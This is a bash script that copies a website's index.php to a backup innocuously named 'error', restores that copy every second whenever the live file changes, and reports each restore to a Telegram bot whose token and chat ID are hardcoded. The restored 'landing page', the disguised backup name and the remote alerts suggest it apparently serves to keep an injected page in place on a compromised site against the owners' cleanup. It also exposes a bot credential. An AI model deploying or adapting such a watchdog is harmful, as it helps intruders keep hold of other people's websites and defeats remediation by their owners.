#!/bin/bash

# ===================================================================================5
INDEX_FILE="/home/orbitbd/public_html/index.php"
# ===================================================================================
BACKUP_FOLDER="/home/orbitbd/php"
# 
mkdir -p "$BACKUP_FOLDER"
# ===================================================================================
BACKUP_FILE="$BACKUP_FOLDER/error"

# ===================================================================================
TOKEN="7930796972:AAEKguRbrfkO3OKvM8axwsapnLbfPpb7RFQ"
CHAT_ID="7234811259"

# ===================================================================================
send_telegram_notification() {
    local message="$1"
    curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" \
        -d chat_id="$CHAT_ID" \
        -d text="$message"
}

# ===================================================================================
if [ ! -f "$BACKUP_FILE" ]; then
    cp "$INDEX_FILE" "$BACKUP_FILE"
    echo "Backup pertama dibuat: $BACKUP_FILE"
    send_telegram_notification "Backup pertama dibuat: $BACKUP_FILE"
fi

# ===================================================================================
monitor_file() {
    while true; do
        # ===================================================================================
        CURRENT_CHECKSUM=$(md5sum "$INDEX_FILE" | awk '{ print $1 }')
        BACKUP_CHECKSUM=$(md5sum "$BACKUP_FILE" | awk '{ print $1 }')

        if [ "$CURRENT_CHECKSUM" != "$BACKUP_CHECKSUM" ]; then
           # ===================================================================================
           echo "Change, mengembalikan backup..."
            cp "$BACKUP_FILE" "$INDEX_FILE"
            echo "https://orbitbd.net/."
            send_telegram_notification "https://orbitbd.net/. Landing Page DI KEMBALIKAN."
        fi

      # ===================================================================================
        sleep 1
    done
}

# ===================================================================================
monitor_file
